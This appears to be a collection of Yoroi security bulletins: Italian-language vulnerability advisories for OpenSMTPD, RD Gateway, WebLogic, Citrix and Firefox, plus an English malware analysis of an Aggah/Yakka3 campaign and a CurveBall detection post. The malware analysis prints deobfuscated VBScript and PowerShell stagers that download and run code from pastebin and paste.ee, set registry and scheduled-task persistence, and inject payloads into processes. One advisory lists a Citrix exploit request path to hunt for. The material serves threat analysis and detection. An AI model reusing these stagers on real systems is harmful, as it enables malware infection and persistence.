Criticità su Servizi di Posta OpenSMTPD

Proto: N060120.

Con la presente Yoroi desidera informarLa riguardo ad una grave vulnerabilità recentemente scoperta sui servizi di posta basati su OpenSMTPD, libreria di servizi open-source distribuita all’interno dei principali sistemi operativi Linux e Unix-Like, tra le principali tecnologie utilizzate per la realizzazione di Mail Transfer Agent.  La criticità è nota con l’identificativo CVE-2020-7247.

A causa di gravi lacune di validazione durante la ricezione dei messaggi di posta, un attaccante remoto non autenticato può essere in grado di eseguire comandi di sistema sul server bersaglio, compromettendone la sicurezza e le informazioni in transito. 

Figura. Potenziale esposizione internet di OpenSMTPD (Fonte:ShodanHQ)

Il Manutentore ha confermato la problematica rilasciando aggiornamenti di sicurezza urgenti ed invitando gli utilizzatori di questa tecnologia ad installare la versione 6.6.2p1, in grado di risolvere la criticità. Le patch sono inoltre in corso di recepimento dai vari gestori di distribuzioni Linux (e.g. Debian, Ubuntu, Fedora, CentOS), i quali le stanno inserendo all’interno del loro ciclo di manutenzione.

Considerata la disponibilità di dettagli tecnici atti a sfruttare la vulnerabilità, la sua relativa bassa complessità di sfruttamento e la potenziale esposizione internet degli eventuali servizi vulnerabili, Yoroi consiglia di pianificare l’aggiornamento delle librerie e dei servizi OpenSMTPD eventualmente in uso presso le vostre infrastrutture od utilizzati all’interno di eventuali Prodotti o Soluzioni software commercializzati.  

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Aggah: How to run a botnet without renting a Server (for more than a year)

Introduction

During the last year, we constantly kept track of the Aggah campaigns. We started deepening inside the Roma225 Campaign and went on with the RG Campaign, contributing to the joint effort to track the offensive activities of this threat actor.

Recently, during our Cyber Defence monitoring operations, we spotted other attack attempts directed to some Italian companies operating in the Retail sector. For this reason, the  Cybaze-Yoroi ZLab team decided to dissect this last Aggah campaign and track its latest variations.

Technical Analysis

Hash77bbd615bc5b34ce007a82a7f365426fc1091ed7eeca3b3888d35b8242288184
ThreatYakka3 Campaign
Brief DescriptionMalicious ppa file dropper with macro
Ssdeep1536:LEFGlBGHLAegbRrnDKSeJ8SuXCak5w/PYvwgqTtCxqTyU2wCNkY:LplBKLAegbRrnDKSeJ8SuXXk5ALgqd2

Table 1. Sample information

The initial file is a Microsoft PowerPoint PPA file. It actually is an Add-in file designed to add new behavior to the classic PowerPoint presentations, in this case to add a nasty macro:

Figure 1: Piece of the malicious macro

The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform.

Figure 2: Result of the Bit.ly link

The HTML page closely matches the modus operandi of the previous Aggah threat. In this case, the blogspot post is named “20sydney new” but it uses the same trick from the past: hiding the javascript stager code inside the web page, an ad hoc code snippet which will be interpreted and executed only by the mshta engine.

Figure 3: Malicious code hidden in the Blogspot web page and executed by the MSHTA engine

The parameter passed the “unescape()” function results in another two layers of encoded strings, adopting a sort of “matrioska unecape obfuscation”. After these layers, we recovered the malicious logic of the stager:

<script language="VBScript">
Set M_c = CreateObject(StrReverse("llehS.tpircSW"))
Dim L_c
L_c = StrReverse("exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc")
M_c.Run L_c, vbHide

set Ixsi = CreateObject(StrReverse("llehS.tpircSW"))
Dim Bik
Bik1 = "mshta http:\\pastebin.com\raw\JELH48mw"
Ixsi.run Bik1, vbHide

set nci = CreateObject(StrReverse("llehS.tpircSW"))
Dim xx
xx1 = "r ""mshta http:\\pastebin.com\raw\JELH48mw"" /F "
xx0 = StrReverse("t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs")
nci.run xx0 + xx1, vbHide

Set ll = CreateObject(StrReverse("llehS.tpircSW"))
no = StrReverse("mmetsaP\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH")
ll.RegWrite no,"mshta http:\\pastebin.com\raw\NxJCPTmQ","REG_SZ"

self.close
</script>

Code Snippet 1

The first part of this initial implant aims to kill the Word and Excel processes. Immediately after that, the malware downloads other code through leveraging mshta once again, this time from a pastebin snippet.

Figure 4: Piece of the malicious Pastebin

The author of this pastes is no more “HAGGA”, as seen in our previous analysis, now the he moved to another one: “YAKKA3”:

Figure 5: Evidence of YAKKA3 Pastebin user

The paste was created on the 25th November 2019 and it has likely been edited many times in the course the last month. In the past Aggah was frequently changing the content of his pastes to modify the malware behaviour and drop many kinds of malware. On some occasions, some of them suspected to be related to the Gorgon APT group. Anyway, during the analysis, the content of the encoded string is the following:

<script language="VBScript">
Set MVn = CreateObject(StrReverse("llehS.tpircSW"))

Mcn = "powershell do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/Zhs3s')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/Fk9yH').replace('*','0x')|IEX;[vroombrooomkrooom]::kekedoyouloveme('calc.exe',$f)"

MVn.Run Mcn, vbHide


self.close
</script>

Code Snippet 2

The above script is a piece of VBS script designed to run some other Powershell loader. The powershell script tests the internet connectivity by pinging to google.com and then starts the infection. The script downloads two other pastes. The first is a PE file and the second one is a custom .NET process injection utility.

The Injector

Hashb8f6cad3723d1dd2219d02f930e5cda776c124387f19f3decd867495ce614eb7
ThreatYakka3 Campaign
Brief DescriptionInjector through process hollowing
Ssdeep384:0UUX1vfjRPJok0e9i3h3i91/EPK59732wag7lRa3oNU1XURDlK67qfM9Wi:0X1qH3hBPU3B7K4NUJCDCfM

Table 2. Sample information of the injector 

The injector component is invoked through its static method “[vroombrooomkrooom]::kekedoyouloveme('calc.exe',$f)”, as seen in the code snippet 2. The only purpose of this component is to inject a payload inside the memory of another one process, as indicated in the parameter.

Figure 6: Write Process Memory technique

The injection technique is very basic. In fact the injection uses the textbook  “CreateRemoteThread” technique, well documented and used actively implemented by many actors and malware developers. 

Figure 7: Injected payload inside calc.exe process

UAC Bypass Tool

In Code Snippet 1 we saw that the aggah implant persists on the target machine by setting the “mshta http:[\\pastebin.]com\raw\NxJCPTmQ” command into the Registry Key “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm”, so, it potentially loads different payloads on every run.

Figure 8: Piece of the malicious script executed by the persistence mechanism

Unlike previous pastes, the author of this one is YAKKA4. Probably, a form of redundancy in case of take down of the other accounts. 

Figure 9: YAKKA4 evidence

Anyway, the code served by this paste downloads another binary file from an additional Paste site: paste.ee.

<script language="VBScript">

Set i9i9 = CreateObject("W" + "S" + "c" + "r" + "i" + "p" + "t" + "." + "S" + "h" + "e" + "l" + "l")
i9i9.Run("P" + "o" + "w" + "e" + "r" + "s" + "h" + "e" + "l" + "l" + "." + "e" + "x" + "e -noexit [Byte[]]$sc64= iex(iex('(&" + "(GCM *W-O*)'+ 'Net.'+" + "'WebC'+'l" + "ient)'+'.Do" + "w'+'nload'+'Str'+'ing(''https://p" + "aste.ee/r/6EdQX'').repl" + "ace(''*^*'',''^%$'').r" + "e" + "p" + "l" + "a" + "c" + "e" + "(''^%$'',''0x'')'));[<##>" + "Ap" + "pDomain<##>]::<##>('(" + "&[email protected]#$%^&*(urrent" + "Domain'.rep" + "lace('(&[email protected]#$%^&*(','C'))<##>.<##>('%" + "*&^*&^*&^*&^*&oad'.r" + "eplace('%" + "*&^*&^*&^" + "*&^*&" + "','L'))(" + "$sc64).'EntryP" + "oint'<##>.<##>('in*&^*" + "&^*&^&*^*&^o" + "k))*()*)(**(&(*&'.r" + "e" + "p" + "l" + "a" + "c" + "e" + "('))*()*)(**" + "(&(*&','e').r" + "e" + "p" + "l" + "a" + "c" + "e" + "('*&^" + "*&^*&^&*^*&^','v'))($null,$null)"),0

self.close
</script>

Code Snippet 3

This last binary actually is a hacking tool implementing the CMSTP Bypass technique, a technique used to bypass Windows UAC prompts. 

According to the Microsoft Documentation, “Connection Manager is a suite of components that provides administrators with the ability to create and distribute customized remote access connections and to create, distribute, and automatically update customized phone books.”.

However, the cyber attackers could exploit an infected INF file to execute arbitrary commands bypassing the UAC, elevating privileges in a stealthy way. In this case the CMSTP Bypass technique implemented into a .NET executable. 

  Figure 10: Synthesis of the CMSTP Bypass technique

The Payload

As we saw in the past, Aggah used to change its payloads during time, and this time we observed that the delivered malware was not RevengeRAT. It rather was a LokiBot variant. This info stealer is well-known in the community since 2016 and it was deeply analyzed in the course of the years. 

In this case, it has the following configuration:

Figure 11: Loki Bot configuration with communication to the C2

The December Payloads

As anticipated before, Aggah payloads are quite dynamic. According to the some observation of community researches such as @DrStache, the Aggah pastebin accounts were dropping AZOrult infostealer few days before the Lokibot observation. 

Investigating the c2 infrastructure through the Azorult-Tracker services, we noticed the AZOrult malware distributed by Aggah in that period was targeting a modest number of victims mainly located in the United States, United Arab Emirates and also Pakistan, Germany and Israel. 

Conclusions

The Aggah actor keeps threatening organizations all around the world. During the time it built a custom stager implant based on legit third parties services, such as Pastebin and BlogSpot, abused by the actor to manage the infected hosts and to run its botnet without renting a server. 

During the last year we contributed to the joint effort to track its activities, along with PaloAlto’s Unit42, and after a year we can confirm it is still active and dangerous. At the moment it is not clear if this actor is just selling its hacking services or running its own campaigns, or both.

In conclusion, there is no hard evidence confirming or denying its potential relationships with the Gorgon APT, and factors like the different nationalities and the small amount of victims connected to December Aggah activities, does not help to exclude it.

Indicators of Compromise

Yara Rules

rule YAKKA3_Campaign_Jan_20_PPA_Macro {
	meta:
  	description = "Yara Rule for Yakka3 campaign macro PPA document"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-01-23"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 1A 88 63 8D A9 78 43 FF }
	 $a2 = { 0D 1B 43 00 1B 44 00 FB 30 1C 33 }
	 $s1 = "Shell" 

    condition:
   	 all of them
}

rule YAKKA3_Campaign_Jan_20_Injector_Module {
	meta:
  	description = "Yara Rule for Yakka3 campaign Injector module"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-01-23"
  	tlp = "white"
  	category = "informational"

	strings:
	 $s1 = "vroombrooomkrooom" 
	 $s2 = "kekedoyouloveme" 
	 $s3 = "WriteProcessMemory"
	 $a1 = { 00 ED 08 8C 05 31 00 ED 08 43 }

    condition:
   	 uint16(0) == 0x5A4D and all of them
}

rule YAKKA3_Campaign_Jan_20_CMSTP_Bypass {
	meta:
  	description = "Yara Rule for Yakka3 campaign CMSTP Bypass"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-01-23"
  	tlp = "white"
  	category = "informational"

	strings:
	 $s1 = "cmstp.exe" ascii wide
	 $s2 = "CurrentVersion" ascii wide 
	 $s3 = "INF" ascii wide
	 $a1 = { 0A 06 8E 69 2D 06 7E 18 }

    condition:
   	 uint16(0) == 0x5A4D and all of them
}

rule YAKKA3_Campaign_Jan_20_LokiBOT_Payload {
	meta:
  	description = "Yara Rule for Yakka3 campaign Loki bot Payload"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-01-23"
  	tlp = "white"
  	category = "informational"

	strings:
	 $s1 = "Fuckav.ru" ascii wide
	 $s2 = "SOFTWARE" wide 

    condition:
   	 uint16(0) == 0x5A4D and $s1 and #s2 > 10
}

This blog post was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB

Vulnerabilità "BlueGate" (Remote Desktop Gateway)

Proto: N050120.

Con la presente Yoroi desidera informarLa riguardo ad un importante aggiornamento riguardo allo stato  di vulnerabilità dei servizi Windows RD Gateway, gateway enterprise per l’accesso centralizzato alle risorse Remote Desktop aziendali. Le criticità sono referenziate con l’alias "BlueGate" e sono note con gli identificativi CVE-2020-0609 e CVE-2020-0610.

A causa di lacune nella gestione della memoria durante le operazioni di ricostruzione dei pacchetti client, un attaccante remoto può essere in grado di eseguire codice arbitrario nel Remote Desktop Gateway senza alcuna autenticazione, accedendo abusivamente a sistemi e reti aziendali. Scenario che comporta rischi non trascurabili specialmente a fronte dell'intensificazione dei tentativi di estorsione e degli attacchi ransomware mirati degli ultimi mesi.

Figura. Potenziale Esposizione Servizi RD Gateway in Italia (Source:ShodanHQ)

Il Produttore ha confermato le problematiche attraverso appositi bollettini di sicurezza (CVE-2020-0610 e CVE-2020-0609), ed ha rilasciato patch per i sistemi Windows Server 2012, Windows Server 2012 R2, Windows Server 2016  e Windows Server 2019 nei consueti aggiornamenti di sicurezza di Gennaio 2020.

Tuttavia, per via della potenziale esposizione di rete dei sistemi vulnerabili (porta di default 3391), della pubblicazione di dettagli tecnici e codici per testare la vulnerabilità, ma soprattutto dell'imminente rilascio di Proof-of-Concept in grado di sfruttare la vulnerabilità per eseguire codice arbitrario, Yoroi consiglia caldamente di applicare con urgenza le patch di sicurezza rilasciate da Microsoft e di limitare l’esposizione internet degli eventuali servizi RD Gateway vulnerabili. 

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Yomi Hunter Catches the CurveBall

The recent CurveBall vulnerability shook the Info-Sec community worldwide: a major vulnerability reported directly by the US National Security Agency. Such uncommon vulnerability reporter alerted the whole Industry, CVE-2020-0601 quickly conquered most of the headlines. 

The reason for this unusual outreach is still not clear, but Microsoft, along with many experts in the industry, confirmed it actually is an important vulnerability having real chances of being abused in the wild.  

The Malware Threat behind CurveBall

There was a little misunderstanding during the first hours after the disclosure of the CVE-2020-0601 vulnerability. Many system administrators and companies were rushing to update internet exposed machines, like web servers or gateways, worried about possible remote code execution, reviving the EternalBlue/WannaCry crisis in their mind. 

Luckily, CurveBall is not the same type of issue. But, if this is true, how exactly it may impact the IT infrastructure and why did the NSA raise such alarm?

What the NSA states is real: CVE-2020-0601 exposes companies to high risks. But it does in a more stealthier way and, differently from EternalBlue, not in a way could be exploited by criminals and vandals for an Internet wide CryptoWorm infection.

In fact, CurveBall enables attackers to trick Windows 10, Windows Server 2016 and Windows Server 2019, to impersonate other trusted parties such as Microsoft itself, resulting in being successfully cryptographically verified by the vulnerable hosts.

Pragmatically, this means organizations relying on CVE-2020-0601 vulnerable cryptography implementations to protect their communication are at risk of man in the middle attacks, and impersonification in general. Even cryptographically signed files and emails are exposed to spoofing and tampering, violating the core parts of the threat models most of the company use to secure their businesses.

Is it all? No. 

CurveBall also poses at risk endpoints and security perimeters due to its appeal for one of the most relevant threats for modern businesses: Malware.

In fact, signed files equal signed malware in the modern threat panorama. Thus, several threat actors, both state sponsored and cyber criminals, may likely abuse the CurveBall vulnerability to fake Microsoft signed executables, impersonating legit files and potentially tricking perimetral and endpoint security technologies relying on the faulty Windows cryptographic validation. 

Yomi Hunter Catches CVE-2020-0601

So, after evaluating the risks of CurveBall exploitation in the wild, especially considering the release of public tools to abuse the vulnerability to sign arbitrary files, we rolled out a new update of Yomi Hunter able to catch CurveBall exploit attempts.

Now, both Private and Public instances of the Yomi Sandbox are actively looking for CVE-2020-0601 exploits trying to evade traditional security controls. The new detection logic is available into malware reports generated by Yomi-Hunter community (e.g. LINK), within the new VirusTotal integrated reports, and for every private instances in use by Yoroi's Cyber Security Defence Center customers.

Figure. CVE-2020-0601 exploit on Yomi Hunter

But, Yomi Hunter does not limits to hunt for Portable Executable files exploiting Curveball. The cryptographic detection mechanism rolled out in the new update supports CVE-2020-0601 exploit detection even for signed Powershell modules.  

If you want to try Yomi: The Malware Hunter please register here!

Vulnerabilità in Servizi Oracle WebLogic

Proto: N040120.

Con la presente Yoroi desidera informarLa riguardo ad importanti vulnerabilità all’interno di Oracle WebLogic, application server alla base di numerose applicazioni e portali Enterprise fondati su Java. Le criticità sono note con l’identificativo CVE-2020-2551 e CVE-2020-2546.

A causa di gravi lacune nella gestione della de-serializzazione delle richieste client nelle componenti “WLS Core” e “Application Container - JavaEE” di WebLogic Server, in particolare all’interno delle implementazioni del protocolli IIOP (porta 3700) e T3 (porta 7001), un attaccante remoto non autenticato può eseguire codice arbitrario nei sistemi bersaglio compromettendone la sicurezza ed accedendovi abusivamente.

Figura. Potenziale esposizione internet del protocollo T3 di Oracle WebLogic (Fonte:ShodanHQ)

Oracle ha confermato le problematiche all’interno del bollettino Critical Patch Update CPUJAN2020, dove ha riportato come vulnerabili le versioni:

Considerata la tipologia di servizi afflitti e della relativa semplicità di sfruttamento segnalata dai ricercatori di sicurezza, Yoroi consiglia di valutare lo stato di vulnerabilità e di esposizione dei servizi afflitti, di pianificare l’applicazione le patch di sicurezza rese disponibili dal Produttore, e di valutare la disabilitazione o il filtraggio perimetrale dei protocolli IIOP e T3.

Figura. Disabilitazione protocollo IIOP.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Nuove Operazioni di Attacco sLoad

Proto: N030120 .

Con la presente Yoroi desidera informarLa riguardo a nuove operazioni di attacco ai danni di Aziende e Utenti italiani. Gli attacchi si manifestano attraverso email di posta elettronica certificata (PEC) diretti al personale amministrativo delle organizzazioni, invitando le vittime a visionare la documentazione allegata contenente finti solleciti di pagamento. 

Figura. Esempio messaggio PEC malevolo

L’archivio allegato alle comunicazioni è in realtà in grado di infettare la macchina bersaglio con impianti malware della famiglia sLoad (TH-163), capace di rimanere silente all’interno del sistema, trafugare dati, installare ulteriore malware e fornire accesso backdoor alle reti locali.

Di seguito si riportano gli indicatori di compromissione estratti durante le analisi condotte:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Grave Vulnerabilità 0-Day su Citrix ADC e NetScaler

Proto: N020120.

Con la presente Yoroi desidera informarLa riguardo ad una grave vulnerabilità 0day presente nelle soluzione tecnologiche NetScaler, Citrix Application Delivery Controller (ADC) e Citrix Gateway, una tra le principali soluzioni tecnologiche adottate in contesti Enterprise per la gestione, il bilanciamento e la fruibilità delle applicazioni aziendali in uso. La criticità è nota con l’identificativo CVE-2019-19781.

La problematica è originata da lacune nella gestione delle richieste http client da parte delle interfacce web degli Appliance in questione, che rendono possibile ad un attaccante remoto di eseguire comandi arbitrari all’interno del sistema, installare backdoor e malware senza alcuna di autenticazione.

Figura. Potenziale esposizione Citrix NetScaler in Italia (Fonte:ShodanHQ)

Il Produttore ha confermato la problematica attraverso il bollettino CTX267027, dove risulta pianificato il rilascio di aggiornamenti firmware a partire dal 20 Gennaio 2020 in poi per tutte le versioni supportate di:

Sono inoltre disponibili mitigazioni temporanee atte a placare la criticità in attesa del rilascio patch di sicurezza ufficiali, rese note dal Vendor con il bollettino CTX267679. Nella fattispecie sono disponibili variazioni alle configurazioni e policy volte ad inibire lo sfruttamento della vulnerabilità per installazioni in modalità "Standalone", "High Availability" e "Cluster".

Per via della possibile esposizione internet delle tecnologie vulnerabili, del pubblico rilascio di dettagli tecnici e strumenti di attacco volti a sfruttare la problematica e della presenza di tentativi di attacco in corso, Yoroi consiglia caldamente di applicare con urgenza le mitigazioni proposte dal Produttore e di pianificare l’installazione degli aggiornamenti firmware previsti per fine Gennaio 2020.  

Yoroi consiglia inoltre di effettuare controlli ed investigazioni precauzionali all’interno dei log degli appliance Citrix ADC e NetScaler, nella fattispecie sui file di log “httpaccess.log” e “httperror.log”, ricercando richieste similari a “POST /vpn/../vpns/portal/scripts/newbm.pl”; nei file di log “bash.log”, ricercando l’utilizzo di comandi lanciati inusualmente (e.g. "curl", "uname", "whoami") e di verificare l’eventuale presenza di processi anomali lanciati dai servizi web.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Attacchi Zero-Day su Mozilla Firefox

 Proto: N010120.

Con la presente Yoroi desidera informarLa riguardo alla recente scoperta di una vulnerabilità 0-day all’interno di Mozilla Firefox, terzo browser più diffuso nel 2019. La criticità è nota con l’identificativo CVE-2019-17026.

La problematica è originata dalla fallace gestione di alcuni alias durante la valorizzazione di vettori e array all’interno del motore JavaScript del browser. Questa circostanza può essere sfruttata da attaccanti remoti per eseguire codice arbitrario ed installare malware all’interno del PC della vittima, ad esempio a seguito dell’apertura di appositi link, della navigazione su siti web compromessi o in scenari di attacco Watering-Hole.

Il Produttore ha confermato la criticità della questione con il bollettino MFSA2020-03, dove ha rilasciato versioni del browser in grado di risolvere la problematica, nel dettagio:

Mozilla ha inoltre confermato di essere a conoscenza di casistiche di attacchi mirati che stanno attivamente sfruttando la vulnerabilità, pertanto Yoroi consiglia caldamente di pianificare l’installazione delle patch di sicurezza all’interno del parco macchine client in Vostra gestione.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index